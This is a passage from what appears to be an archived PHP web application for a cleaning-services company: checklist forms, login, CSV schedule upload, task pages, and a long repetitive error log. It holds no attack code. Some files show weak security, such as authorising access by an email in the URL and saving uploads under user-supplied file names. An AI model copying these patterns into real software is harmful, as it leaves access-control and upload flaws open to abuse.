"; $result = sendEmail($email, "New Tasks Assigned", $emailTemplate); if (strpos($result, 'Email sent') !== false) { $successes[] = "Bulk email sent successfully to $email"; } else { $errors[] = "Failed to send bulk email to $email: $result"; } } echo json_encode(empty($errors) ? ['status' => 'success', 'message' => $successes] : ['status' => 'partial', 'successes' => $successes, 'errors' => $errors]); } else { echo json_encode(['status' => 'error', 'message' => "Invalid action parameter: $action"]); } } else { echo json_encode(['status' => 'error', 'message' => 'Invalid request method']); } ?> subtaskform.php000064400000054632151676701240007640 0ustar00 Holiday Program Cleaning Checklist getSubtaskDetailsForWorkForm($subtask_id); // Check if subtask is empty if (empty($subtask)) { echo "No subtask found"; exit(); } if($subtask->completed == 1 && $subtask->completed_at != null && $subtask->form_submission_id != null) { echo "This form has already been submitted.
View the submitted form here"; exit(); } } ?>
Emera Facility Services
Company Logo

Holiday Program Cleaning Checklist

service_name); ?>

subtask_date); ?>

Main Area

Kitchen Area

Bathrooms and Toilets

This document is to be completed after every visit from the professional cleaner. Once completed, please take a photo and send it to your supervisor.
completedsubtaskform.php000064400000027446151676701240011540 0ustar00getTaskFormById($id); //check if subtask is empty if (empty($subtask)) { echo "No subtask found"; exit(); } } ?> Preview Holiday Program Cleaning Checklist
Company Logo

Preview Holiday Program Cleaning Checklist

school_name) ?>

date) ?>

Checklist

main_areas; // Define all possible items for each section $all_main_area_items = [ "Vacuum/Sweep hard floors and carpet areas", "Disinfect and mop hard floor areas", "Bin Emptied" ]; $all_kitchen_area_items = [ "Vacuum/Sweep hard floors", "Disinfect and mop hard floor areas", "Clean and wipe benchtops surroundings", "Bin Emptied" ]; $all_bathroom_area_items = [ "Clean and disinfect sinks and taps", "Clean and disinfect toilets", "Floor sweep and mop", "Bin Emptied" ]; // Function to render checkboxes function renderCheckboxes($all_items, $selected_items) { foreach ($all_items as $item) { $is_checked = in_array($item, $selected_items); // Check if the item is in the selected items array echo '
'; echo ''; echo ''; echo '
'; } } // Function to render raw checkboxes function renderRawCheckboxes($raw_data, $all_items) { $selected_items = explode(", ", $raw_data); foreach ($all_items as $item) { $is_checked = in_array($item, $selected_items); // Check if the item is in the selected items array echo '
'; echo ''; echo ''; echo '
'; } } // Check if main_areas_data is a valid JSON string $decoded_data = json_decode($main_areas_data, true); if (json_last_error() === JSON_ERROR_NONE) { // If valid JSON, render based on JSON data echo '

Main Area

'; renderCheckboxes($all_main_area_items, $decoded_data['mainArea'] ?? []); echo '

Kitchen Area

'; renderCheckboxes($all_kitchen_area_items, $decoded_data['kitchenArea'] ?? []); echo '

Bathrooms and Toilets

'; renderCheckboxes($all_bathroom_area_items, $decoded_data['bathroomArea'] ?? []); } else { $main_areas = explode(", ", $subtask->main_areas); foreach ($main_areas as $area) { echo '
'; echo ''; echo ''; echo '
'; } } ?>
Client Signature
Staff Signature
This Document is to be completed after every visit from the professional cleaner. Once completed, please take a photo and send it to your supervisor.
taskformOld.php000064400000052547151676701240007570 0ustar00 Holiday Program Cleaning Checklist getTaskById($task_id); // Fetch all subtasks for the given task_id $subtasks = $subtaskService->getAllSubtasksForTask($task_id); $taskOwnerEmail = $task->assignedCleaneremail; //check if the task owner email is equil form the email from the url if($taskOwnerEmail != $_GET['email']){ echo "Unauthorized Access"; exit(); } // Check if subtasks are empty if (empty($subtasks)) { echo "No subtasks found for this task"; exit(); } // Check if TODAY exists in subtask dates and get the corresponding subtask $today_date = date('Y-m-d'); $today_subtask = null; foreach ($subtasks as $subtask) { if ($subtask->subtask_date == $today_date) { $today_subtask = $subtask; break; } } // If no subtask found for today, show an appropriate message if (!$today_subtask) { echo "No subtasks scheduled for today"; exit(); } // Check if assigned cleaner email is null in task if ($task->assignedCleaneremail == null) { echo "No cleaner assigned to this task"; exit(); } // Check if subtask has already been submitted if ($today_subtask->completed == 1 && $today_subtask->completed_at != null && $today_subtask->form_submission_id != null) { echo "This subtask has already been submitted.
View the submitted form here"; exit(); } // Display the found subtask details //echo "Subtask found for today:
"; //echo "Subtask ID: " . $today_subtask->id . "
"; //echo "Subtask Date: " . $today_subtask->subtask_date . "
"; // Additional details display or processing can be added here } ?>
Emera Facility Services
Company Logo

Holiday Program Cleaning Checklist

Main Areas

Kitchen Area

Bathrooms and Toilets

Clean and Disinfect Toilets

This document is to be completed after every visit from the professional cleaner. Once completed, please take a photo and send it to your supervisor.
reset-password.php000064400000011467151676701240010261 0ustar00 Reset Password | Emera Facility Services
Emera Logo

Enter your new password

Remembered? Sign In

process_upload.php000064400000020542151676701240010313 0ustar00 'Invalid file format. Please upload a CSV file.')); exit; } // Move uploaded file to a directory (you may need to adjust the destination directory) $uploadDir = '../uploads/'; $uploadPath = $uploadDir . $fileName; if (!move_uploaded_file($fileTmpPath, $uploadPath)) { $errorCode = $_FILES['file']['error']; $errorMessage = error_get_last(); echo json_encode(array('error' => 'Failed to move uploaded file. Error code: ' . $errorCode . '. ' . $errorMessage)); exit; } // CSV file path $csvFile = $uploadPath; // Schedule Name is file name and year is current year $scheduleName = pathinfo($csvFile, PATHINFO_FILENAME); //get current user id form the post request $currentUserId = $_POST['current_user_id']; // Initialize an array to store tasks $tasks = []; // Open the CSV file for reading if (($handle = fopen($csvFile, "r")) !== FALSE) { // Read headers from the first row (assuming the first row is headers) $headers = fgetcsv($handle, 1000, ","); if ($headers === false) { echo json_encode(array('error' => 'Failed to read headers from the CSV file.')); exit; } // Iterate through each row of data while (($data = fgetcsv($handle, 1000, ",")) !== FALSE) { // Initialize task array $task = [ 'service' => $data[0], // First column as service ID 'region' => $data[1], // Second column as region 'frequency' => !empty($data[2]) ? $data[2] : '3x/week', // Third column as frequency or default to '3x/week' 'dates' => [] ]; // Iterate over date headers and add non-empty dates to the 'dates' array for ($i = 3; $i < count($headers); $i++) { // Adjust date format if needed $date = DateTime::createFromFormat('m/d/Y', $headers[$i]); if ($date !== false) { $formattedDate = $date->format('Y-m-d'); // Format date as YYYY-MM-DD $time = isset($data[$i]) ? $data[$i] : ''; // Get time value or empty string if not set // Replace 'x' with empty string for time if needed if (!empty($time)) { if ($time === 'x') { $time = null; // Convert 'x' to empty string } $task['dates'][] = [ 'date' => $formattedDate, 'time' => $time ]; } } else { echo json_encode(array('error' => 'Failed to parse date: ' . $headers[$i])); exit; } } // Add the task to the tasks array only if there are dates with times if (!empty($task['dates'])) { $tasks[] = $task; } } // Construct final JSON structure $jsonOutput = [ 'scheduleName' => $scheduleName, 'currentUserId' => $currentUserId, 'tasks' => $tasks ]; // Convert JSON to string $jsonData = json_encode($jsonOutput); // Proceed with database insertion using $jsonData $data = json_decode($jsonData, true); // Decode JSON string to associative array // Extract schedule name and tasks $scheduleName = isset($data['scheduleName']) ? trim($data['scheduleName']) : ''; $currentUserId = isset($data['currentUserId']) ? trim($data['currentUserId']) : ''; $tasks = isset($data['tasks']) ? $data['tasks'] : []; $now = date('Y-m-d H:i:s'); try { // Create a new schedule $schedule = new Schedules('', $scheduleName, $currentUserId, false, $now, $now); $scheduleService = new ScheduleService(); $schedule_id = $scheduleService->addScheduleRetuenlastinsertedid($schedule); // Check if schedule creation was successful if (!$schedule_id) { echo json_encode(array('error' => 'Failed to add schedule.')); exit; } // Loop through tasks array and add each task foreach ($tasks as $taskData) { $serviceName = isset($taskData['service']) ? trim($taskData['service']) : ''; $region = isset($taskData['region']) ? trim($taskData['region']) : ''; $frequency = isset($taskData['frequency']) ? trim($taskData['frequency']) : ''; $dates = isset($taskData['dates']) ? $taskData['dates'] : []; // Validate and format dates and times $formattedDates = []; foreach ($dates as $date) { // Ensure time is converted to empty string if 'x' is found $time = $date['time'] === 'x' ? null : $date['time']; $formattedDates[] = [ 'date' => $date['date'], 'time' => $time ]; } // Get service ID from service name and region $service = $serviceService->getServiceByNameAndRegion($serviceName, $region); // Check if service exists if (!$service) { // Service does not exist, create a new service $service = new Service("", $serviceName, $region, "", "", "", "", "", "", "Australia", "", "", "", "", $now, $now); // Attempt to add the service $service_id = $serviceService->addServicereturnlastid($service); if (!$service_id) { // Handle error if service creation fails echo "Failed to create or retrieve service."; exit; // Exit or return depending on your flow } } else { // Service already exists, use its ID $service_id = $service->id; } // Create a new task instance with the formatted dates and times $task = new Task('', $schedule_id, $service_id, $frequency, json_encode($formattedDates), $currentUserId, $currentUserId, $now, $now, false, null, false, false, false, null, null, false); $taskService = new TaskService(); $task_id = $taskService->addTask($task); // Check if task creation was successful if (!$task_id) { echo json_encode(array('error' => 'Failed to add task.')); exit; } } // If everything is successful, return a success response echo json_encode(array('success' => true, 'message' => 'Tasks added successfully.', 'schedule_id' => $schedule_id)); } catch (Exception $e) { // Handle any exceptions and return an error response echo json_encode(array('error' => $e->getMessage())); } } else { echo json_encode(array('error' => 'Failed to open the CSV file.')); } // Close the file handle fclose($handle); } else { echo json_encode(array('error' => 'No file uploaded or invalid file upload.')); } ?> submit_form.php000064400000003001151676701240007606 0ustar00insertTaskForm($taskForm)) { echo "Task Form added successfully!"; } else { echo "Failed to add task form."; } } ?> taskform.php000064400000061020151676701240007113 0ustar00 Holiday Program Cleaning Checklist getTaskById($task_id); // Fetch all subtasks for the given task_id $subtasks = $subtaskService->getAllSubtasksForTask($task_id); $taskOwnerEmail = $task->assignedCleaneremail; //check if the task owner email is equil form the email from the url if($taskOwnerEmail != $_GET['email']){ echo "Unauthorized Access"; exit(); } // Check if subtasks are empty if (empty($subtasks)) { echo "No subtasks found for this task"; exit(); } // Check if TODAY exists in subtask dates and get the corresponding subtask $today_date = date('Y-m-d'); $today_subtask = null; foreach ($subtasks as $subtask) { if ($subtask->subtask_date == $today_date) { $today_subtask = $subtask; break; } } // If no subtask found for today, show an appropriate message if (!$today_subtask) { echo "No subtasks scheduled for today"; exit(); } // Check if assigned cleaner email is null in task if ($task->assignedCleaneremail == null) { echo "No cleaner assigned to this task"; exit(); } // Check if subtask has already been submitted if ($today_subtask->completed == 1 && $today_subtask->completed_at != null && $today_subtask->form_submission_id != null) { echo "This subtask has already been submitted.
View the submitted form here"; exit(); } // Display the found subtask details //echo "Subtask found for today:
"; //echo "Subtask ID: " . $today_subtask->id . "
";c //echo "Subtask Date: " . $today_subtask->subtask_date . "
"; // Additional details display or processing can be added here } ?>
Emera Facility Services
Company Logo

Holiday Program Cleaning Checklist

service_name); ?>

subtask_date); ?>

Main Area

Kitchen Area

Bathrooms and Toilets

This document is to be completed after every visit from the professional cleaner. Once completed, please take a photo and send it to your supervisor.
login.php000064400000015236151676701240006405 0ustar00 Login | Emera Facility Services
Emera Logo

Happy to see you again!

$error
"; } ?>
authenticateuser.php000064400000001243151676701240010643 0ustar00login($email, $password); if ($user) { session_start(); $_SESSION['user_id'] = $user->id; $_SESSION['user_email'] = $user->email; $_SESSION['user_role'] = $user->role; $_SESSION['status'] = $user->status; echo "Authenticated as " . $user->role; } else { echo "Invalid email or password"; } } ?> logout.php000064400000000177151676701240006604 0ustar00 subcontractor/viewAcceptedTasks.php000064400000025213151676701240013572 0ustar00getAllServicesForDropdown(); $currentCompanyId = 2; // Replace with dynamic company ID as needed // Create TaskService instance $taskService = new TaskService(); $tasks = $taskService->getTasksByAssignedId($companyId); ?>

View Tasks

ID Service Name Region Frequency Created At Completed Actions
id; ?> service_name; ?> region; ?> frequency; ?> created_at)); ?> View Details
subcontractor/error_log000064400001007371151676701240011373 0ustar00[15-Sep-2024 07:45:28 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/pages/subcontractor/dashboard.php on line 22 [16-Sep-2024 09:12:37 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [16-Sep-2024 09:13:57 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [16-Sep-2024 09:14:19 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [16-Sep-2024 09:31:46 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [16-Sep-2024 09:33:50 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [16-Sep-2024 12:35:08 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [16-Sep-2024 12:44:32 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [16-Sep-2024 12:59:07 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [16-Sep-2024 13:13:47 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [16-Sep-2024 13:13:54 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [16-Sep-2024 13:13:55 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2024 03:21:27 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2024 04:20:17 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2024 04:30:55 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2024 04:37:54 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2024 04:38:08 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2024 05:59:00 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [19-Sep-2024 05:43:42 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [19-Sep-2024 05:44:59 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [19-Sep-2024 05:46:00 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 00:24:37 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 01:28:44 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 01:38:32 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 01:59:37 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 03:18:49 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 06:23:50 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 06:24:11 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 06:24:52 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 06:25:09 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 06:25:45 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 06:25:48 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 06:31:16 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [20-Sep-2024 06:58:27 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [21-Sep-2024 04:23:09 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [21-Sep-2024 04:42:29 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [21-Sep-2024 04:42:32 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 04:36:45 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 04:36:50 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 04:48:36 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 04:48:58 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 04:50:00 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 04:50:17 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 04:50:26 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 04:51:32 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 05:20:51 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 05:21:18 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 10:26:34 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 11:18:54 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [22-Sep-2024 23:55:04 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 01:23:35 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 01:36:31 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 01:47:52 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 02:23:26 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 02:28:16 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 02:33:57 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 02:34:00 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 02:44:48 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 02:45:30 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 03:02:41 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 03:10:44 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 04:04:01 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 05:49:59 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 06:05:21 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 06:11:02 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 06:52:34 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 07:11:11 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 07:15:46 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 08:01:35 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 08:22:53 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 08:57:03 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 09:56:51 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 09:57:52 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [23-Sep-2024 10:52:57 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 01:30:11 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 01:48:04 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 02:36:21 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 03:34:25 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 04:32:06 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 05:51:45 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 06:12:06 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 06:18:02 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 07:52:40 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 09:13:44 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 10:54:42 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [24-Sep-2024 22:58:05 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 00:45:32 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 01:06:26 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 01:16:24 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 02:01:37 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 02:52:45 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 02:54:18 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 03:08:16 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 03:08:44 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 03:14:37 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 03:29:03 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 04:20:26 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 04:29:58 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 04:30:25 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 05:07:39 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 05:10:58 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 06:19:25 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 06:33:22 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 07:00:24 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 07:33:09 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 07:59:39 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 23:25:45 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [25-Sep-2024 23:30:07 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 00:59:07 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 01:01:04 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 01:17:21 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 03:01:46 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 03:50:30 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 04:14:07 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 04:25:34 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 05:04:36 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 05:06:13 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 06:19:32 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 07:43:08 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 07:48:46 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 07:55:13 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 07:55:28 UTC] PHP Warning: Undefined array key "pending" in /home/ftmgc76wdee4/public_html/pages/subcontractor/dashboard.php on line 22 [26-Sep-2024 23:49:48 UTC] 